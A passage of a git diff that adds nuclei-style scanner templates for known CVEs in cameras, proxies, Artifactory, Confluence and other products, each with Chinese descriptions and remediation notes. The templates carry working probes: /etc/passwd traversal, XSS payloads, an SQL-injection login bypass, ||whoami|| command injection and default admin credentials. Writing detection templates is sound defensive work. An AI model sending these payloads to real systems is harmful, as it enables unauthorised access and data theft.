/error/http|ErrCode=406.htm",在行前加上#号注释,屏蔽响应页面 +requests: +- matchers: + - type: status + status: + - 406 + - type: word + condition: and + words: + - Not Acceptable + - 'Available variants:' + -
Apache Server at + matchers-condition: and + path: + - '{{BaseURL}}/index' + method: GET + headers: + Accept: fake/value diff --git a/config/51pwn/yaml/Apexis/Apexis-IP-CAM-Password-Read.yaml b/config/51pwn/yaml/Apexis/Apexis-IP-CAM-Password-Read.yaml new file mode 100755 index 000000000..c42341291 --- /dev/null +++ b/config/51pwn/yaml/Apexis/Apexis-IP-CAM-Password-Read.yaml @@ -0,0 +1,35 @@ +id: Apexis-IP-CAM-Password-Read +info: + name: Apexis IP CAM密码读取 + author: + - jim2g + description: |- + Apexis IP CAM存在密码读取 + Apexis APM-H803-MPC是中国富泓(Apexis)电子公司的一款红外网络摄像机产品。攻击者可利用该漏洞绕过登录页面并访问网络摄像机的内容 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.apexis.com.cn/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"ret_tutk_pwd") + raw: + - | + GET /cgi-bin/get_tutk_account.cgi HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Apexis/Apexis-IPCAM-directory-traversal.yaml b/config/51pwn/yaml/Apexis/Apexis-IPCAM-directory-traversal.yaml new file mode 100755 index 000000000..74adf6515 --- /dev/null +++ b/config/51pwn/yaml/Apexis/Apexis-IPCAM-directory-traversal.yaml @@ -0,0 +1,26 @@ +id: Apexis-IPCAM-directory-traversal +info: + name: Apexis IP CAM目录遍历 + author: + - jim2g + description: | + Apexis IP CAM存在目录遍历 + 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web根目录以外的文件),甚至执行系统命令。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.apexis.com.cn/\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n" +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"Index of cgi-bin") + raw: + - | + GET /cgi-bin HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Apexis/Apexis-IPCAM-info.yaml b/config/51pwn/yaml/Apexis/Apexis-IPCAM-info.yaml new file mode 100755 index 000000000..ed047236d --- /dev/null +++ b/config/51pwn/yaml/Apexis/Apexis-IPCAM-info.yaml @@ -0,0 +1,35 @@ +id: Apexis-IPCAM-info +info: + name: Apexis IP CAM信息泄露 + author: + - jim2g + description: | + Apexis IP CAM存在信息泄露 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.apexis.com.cn/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"ret_") + raw: + - | + GET /cgi-bin/get_status.cgi HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/AppServ/CVE-2008-2398.yaml b/config/51pwn/yaml/AppServ/CVE-2008-2398.yaml new file mode 100755 index 000000000..56ce79801 --- /dev/null +++ b/config/51pwn/yaml/AppServ/CVE-2008-2398.yaml @@ -0,0 +1,40 @@ +id: CVE-2008-2398 +info: + name: AppServ Open Project 2.5.10 and earlier XSS + author: + - unstabl3 + tags: + - cve + - cve2008 + - xss + description: |- + AppServ 跨站脚本漏洞 + AppServ Open Project 2.5.10以及之前的版本中的index.php存在跨站脚本攻击漏洞。远程攻击者可以借助appservlang参数,注入任意的web脚本或HTML。 + reference: + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + - http://www.securityfocus.com/bid/29291 + - http://secunia.com/advisories/30333 + - http://securityreason.com/securityalert/3896 + severity: medium + classification: + cve-id: + - cve-2008-2398 + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.appservnetwork.com/index.php?modules=news&applang=en + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - '!contains(body,".php?appservlang=")' + - contains(body,"") + matchers-condition: and + path: + - '{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28document.domain%29%3E' + method: GET + req-condition: true diff --git a/config/51pwn/yaml/Application Performance Management/CVE-2020-11854.yaml b/config/51pwn/yaml/Application Performance Management/CVE-2020-11854.yaml new file mode 100755 index 000000000..e56bc3a0d --- /dev/null +++ b/config/51pwn/yaml/Application Performance Management/CVE-2020-11854.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-11854 +info: + name: Micro Focus UCMDB - Remote Code Execution + author: + - l0ne1y + description: |- + Micro Focus Application Performance Management 代码执行漏洞 + Micro Focus Application Performance Management是英国Micro Focus公司的一款从基础设施到应用程序的全方位监控系统。 + + Micro Focus 多款产品存在信任管理问题漏洞,攻击者可利用该漏洞执行任意代码。以下产品及版本受到影响:Operation Bridge Manager 2020.05版本, 2019.11版本, 2019.05版本, 2018.11版本, 2018.05版本, 10.63版本,10.62版本, 10.61版本, 10.60版本, 10.12版本, 10.11版本, 10.10版本之前所有版本, Operations Bridge (containerized) 2020.05版本, 2019.08版本, 2019.05版本, 2018.11版本, 2018.08版本, 2018.05版本. 2018.02版本 和 2017.11. 3版本, Application Performance Management 9,51版本, 9.50版本, 9.40版本 uCMDB 10.33版本 CUP。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://softwaresupport.softwaregrp.com/doc/KM03747657 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - HttpUcmdbServiceProviderFactoryImpl + - ServerVersion=11.6.0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/ucmdb-api/connect' + method: GET diff --git a/config/51pwn/yaml/Appweb/CVE-2018-8715.yaml b/config/51pwn/yaml/Appweb/CVE-2018-8715.yaml new file mode 100755 index 000000000..49aa046f8 --- /dev/null +++ b/config/51pwn/yaml/Appweb/CVE-2018-8715.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-8715 +info: + name: AppWeb Authentication Bypass vulnerability + author: + - l0ne1y + description: |- + Embedthis Software Appweb Embedthis HTTP库认证绕过漏洞 + Embedthis Software AppWeb是美国Embedthis Software公司的一款快速小型的Web服务器,它主要用于嵌入式应用、设备和Web服务,并支持安全防御策略、摘要式身份验证、虚拟主机等。HTTP library是其中的一个HTTP库。 + + Embedthis Software Appweb 7.0.3之前的版本中的Embedthis HTTP库存在安全漏洞。攻击者可利用该漏洞绕过身份验证。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/embedthis/appweb/issues/610 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - + matchers-condition: and + raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Authorization: Digest username=admin diff --git a/config/51pwn/yaml/Aptana Jaxer/CVE-2019-14312.yaml b/config/51pwn/yaml/Aptana Jaxer/CVE-2019-14312.yaml new file mode 100755 index 000000000..a905fb96d --- /dev/null +++ b/config/51pwn/yaml/Aptana Jaxer/CVE-2019-14312.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-14312 +info: + name: Aptana Jaxer 1.0.3.4547 - Local File inclusion + author: + - daffainfo + description: |- + Aptana Jaxer 任意文件读取漏洞 + Aptana Jaxer是一款开源的JavaScript服务器。 + + Aptana Jaxer 1.0.3.4547版本中的wikilite源码浏览器存在本地文件包含漏洞。远程攻击者可借助tools/sourceViewer/index.html?filename=../ URI利用该漏洞读取内部文件。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://www.jaxer.org/ + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' + method: GET diff --git a/config/51pwn/yaml/Argus Surveillance DVR/CVE-2018-15745.yaml b/config/51pwn/yaml/Argus Surveillance DVR/CVE-2018-15745.yaml new file mode 100755 index 000000000..aeb0f38f6 --- /dev/null +++ b/config/51pwn/yaml/Argus Surveillance DVR/CVE-2018-15745.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-15745 +info: + name: Argus Surveillance DVR - Directory Traversal + author: + - gy741 + description: |- + Argus Surveillance DVR 路径遍历漏洞 + Argus Surveillance DVR是加拿大Argus Surveillance公司的一款硬盘录像机设备。 + + Argus Surveillance DVR 4.0.0.0版本中的WEBACCOUNT.CGI文件存在目录遍历漏洞。攻击者可借助‘RESULTPAGE’参数中的‘..\\%2F’利用该漏洞泄露文件。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.argussurveillance.com/ + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - for 16-bit app support + - '[drivers]' + matchers-condition: and + path: + - '{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=' + method: GET diff --git a/config/51pwn/yaml/Artica Pandora FMS/CVE-2020-8497.yaml b/config/51pwn/yaml/Artica Pandora FMS/CVE-2020-8497.yaml new file mode 100755 index 000000000..0c3d29431 --- /dev/null +++ b/config/51pwn/yaml/Artica Pandora FMS/CVE-2020-8497.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-8497 +info: + name: Artica Pandora FMS - Arbitrary File Read + author: + - gy741 + description: "Artica Pandora FMS 信息泄露漏洞 \nArtica Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。\n\nArtica + Pandora FMS 7.42及之前版本中存在安全漏洞。攻击者可利用该漏洞读取聊天记录(该JSON文件包含用户名,用户ID,私人消息和时间戳)。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://artica.es/ + + 临时修复方案:
1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面
2、将敏感信息进行加密存储,非必要不可发送前端
3、发送敏感信息时需加密传输,如有必要需脱敏处理
4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。
5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口
令、会话标识jsessionid等), 防止敏感信息泄漏。
6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓
存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。
7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"type"' + - '"id_user"' + - '"user_name"' + - '"text"' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt' + method: GET diff --git a/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-13158.yaml b/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-13158.yaml new file mode 100755 index 000000000..da57ad8f2 --- /dev/null +++ b/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-13158.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-13158 +info: + name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal + author: + - 0x_akoko + description: "ArticaTech Artica Proxy 任意文件读取\n ArticaTech Artica Proxy是法国ArticaTech公司的一款开源的Artica代理解决方案。\n\nArticaTech + Artica Proxy 4.30.000000 Community Edition之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 " + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://www.articatech.net/ + + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd' + method: GET diff --git a/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17505.yaml b/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17505.yaml new file mode 100755 index 000000000..1f37917b4 --- /dev/null +++ b/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17505.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-17505 +info: + name: Artica Web Proxy 4.30 OS Command Injection + author: + - dwisiswant0 + description: |- + ArticaTech Artica Proxy 操作系统命令执行漏洞 + ArticaTech Artica Proxy是法国ArticaTech公司的一款开源的Artica代理解决方案。 + + Artica Web Proxy 4.30.000000版本中的cyrus.php文件的‘service-cmds’参数存在安全漏洞。远程攻击者可利用该漏洞以root权限执行命令。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + http://www.articatech.com/index.php + + 临时修复方案:
1、尽量不去执行外部的应用程序或命令。
2、使用自定义函数或函数库实现外部应用程序或命令的功能。
3、在执行system、eval等命令执行功能的函数前,校验参数内容。
4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: word + condition: and + part: body + words: + - array(2) + - 'Position: ||whoami||' + - root + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + - | + GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 + Host: {{Hostname}} + Accept: */* + cookie-reuse: true diff --git a/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17506.yaml b/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17506.yaml new file mode 100755 index 000000000..6311c2088 --- /dev/null +++ b/config/51pwn/yaml/ArticaTech Artica Proxy/CVE-2020-17506.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-17506 +info: + name: Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection + author: + - dwisiswant0 + description: |- + ArticaTech Artica Web Proxy SQL注入漏洞 + ArticaTech Artica Proxy是法国ArticaTech公司的一款开源的Artica代理解决方案。 + + Artica Web Proxy 4.30.00000000版本中的fw.login.php文件的‘apikey’参数存在SQL注入漏洞。远程攻击者可利用该漏洞绕过特权检测并获得Web后端管理员特权。 + severity: critical + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://www.articatech.com/index.php + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。
5、网站每个数据层的编码统一,建议全部使用UTF-8编码,上下层编码不一致有可能导致一些过滤模型被绕过。
6、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。
7、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。
8、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + words: + - artica-applianc + - type: status + condition: or + status: + - 200 + - 301 + - 302 + - type: word + part: header + words: + - PHPSESSID + extractors: + - type: kval + kval: + - PHPSESSID + matchers-condition: and + path: + - '{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;' + method: GET + max-redirects: 1 + redirects: true diff --git a/config/51pwn/yaml/Artifactory/CVE-2019-17444.yaml b/config/51pwn/yaml/Artifactory/CVE-2019-17444.yaml new file mode 100755 index 000000000..d4a6a7cc8 --- /dev/null +++ b/config/51pwn/yaml/Artifactory/CVE-2019-17444.yaml @@ -0,0 +1,39 @@ +id: CVE-2019-17444 +info: + name: Jfrog Artifactory <6.17.0 - Default Admin Password + author: + - l0ne1y + description: |- + JFrog Artifactory 弱口令 + JFrog Artifactory是以色列JFrog公司的一款开源的通用Artifact存储库管理器,它支持集群和高可用性Docker注册表,并提供端到端的用于跟踪从开发到生产的工件自动化解决方案。 + + Jfrog Artifactory 6.17.0之前版本存在安全漏洞,该漏洞源于使用管理帐户的默认密码(如“password”),不要求用户更改它们。攻击者可利用该漏洞完全破坏Jfrog Artifactory。 + severity: critical + remediation: |- + 修复方案: + 1、建议系统管理人员将已发现的弱口令立即改成强口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"name":"admin"' + - '"admin":true' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /ui/api/v1/ui/auth/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{RootURL}} + + {"user":"admin","password":"password","type":"login"} diff --git a/config/51pwn/yaml/Artifactory/CVE-2019-9733.yaml b/config/51pwn/yaml/Artifactory/CVE-2019-9733.yaml new file mode 100755 index 000000000..940ca7809 --- /dev/null +++ b/config/51pwn/yaml/Artifactory/CVE-2019-9733.yaml @@ -0,0 +1,42 @@ +id: CVE-2019-9733 +info: + name: JFrog Artifactory 6.7.3 - Admin Login Bypass + author: + - l0ne1y + description: |- + JFrog Artifactory 认证绕过漏洞 + JFrog Artifactory是以色列JFrog公司的一款开源的通用Artifact存储库管理器,它支持集群和高可用性Docker注册表,并提供端到端的用于跟踪从开发到生产的工件自动化解决方案。 + + JFrog Artifactory 6.8.7之前版本中存在访问控制错误漏洞。该漏洞源于网络系统或产品未正确限制来自未授权角色的资源访问。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://jfrog.com/ + + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 +requests: +- matchers: + - type: word + part: body + words: + - '"username": "access-admin"' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + X-Requested-With: artUI + X-Forwarded-For: 127.0.0.1 + Request-Agent: artifactoryUI + Content-Type: application/json + Origin: {{BaseURL}} + Referer: {{BaseURL}}/artifactory/webapp/ + + {"user":"access-admin","password":"password","type":"login"} diff --git a/config/51pwn/yaml/Aruba AirWave/CVE-2016-8527.yaml b/config/51pwn/yaml/Aruba AirWave/CVE-2016-8527.yaml new file mode 100755 index 000000000..4d127461f --- /dev/null +++ b/config/51pwn/yaml/Aruba AirWave/CVE-2016-8527.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-8527 +info: + name: Aruba Airwave - (XSS) + author: + - l0ne1y + description: |- + Aruba AirWave Management Platform 跨站脚本漏洞 + Aruba AirWave是美国安移通网络(Aruba)公司的一套适用于多供应商管理系统的网络管理软件。该软件具备端到端监控能力,可改善网络操作和管理RF安全性,以及提供实时监控、主动报警和历史数据报告等功能。VisualRF是其中的一个射频组件。 + + Aruba AirWave 8.2.3.1之前的版本中的VisualRF组件存在跨站脚本漏洞。攻击者可通过诱使用户点击恶意链接利用该漏洞获取敏感信息(包括会话cookies或密码)。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match' + method: GET diff --git a/config/51pwn/yaml/Atlassian Confluence/CVE-2015-8399.yaml b/config/51pwn/yaml/Atlassian Confluence/CVE-2015-8399.yaml new file mode 100755 index 000000000..45e218bf2 --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/CVE-2015-8399.yaml @@ -0,0 +1,34 @@ +id: CVE-2015-8399 +info: + name: Atlassian Confluence configuration files read + author: + - l0ne1y + description: |- + Atlassian Confluence信息泄露漏洞 + Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。 + + Atlassian Confluence 5.8.17之前版本中存在安全,该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过滤‘decoratorName’参数。远程攻击者可利用该漏洞读取配置文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.atlassian.com/software/confluence/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - confluence-init.properties + - View Default Decorator + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName' + method: GET diff --git a/config/51pwn/yaml/Atlassian Confluence/CVE-2018-20824.yaml b/config/51pwn/yaml/Atlassian Confluence/CVE-2018-20824.yaml new file mode 100755 index 000000000..c21d94983 --- /dev/null +++ b/config/51pwn/yaml/Atlassian Confluence/CVE-2018-20824.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20824 +info: + name: Atlassian Jira WallboardServlet XSS + author: + - l0ne1y + tags: + - cve + - cve2018 + - atlassian + - jira + - xss + description: |- + Atlassian Jira 7.13.1 跨站脚本漏洞 + + Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。 + + Atlassian Jira 7.13.1之前版本中的‘cyclePeriod’参数存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + reference: + - https://jira.atlassian.com/browse/jraserver-69238 + severity: medium + classification: + cve-id: + - cve-2018-20824 + cwe-id: + - cwe-79 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + 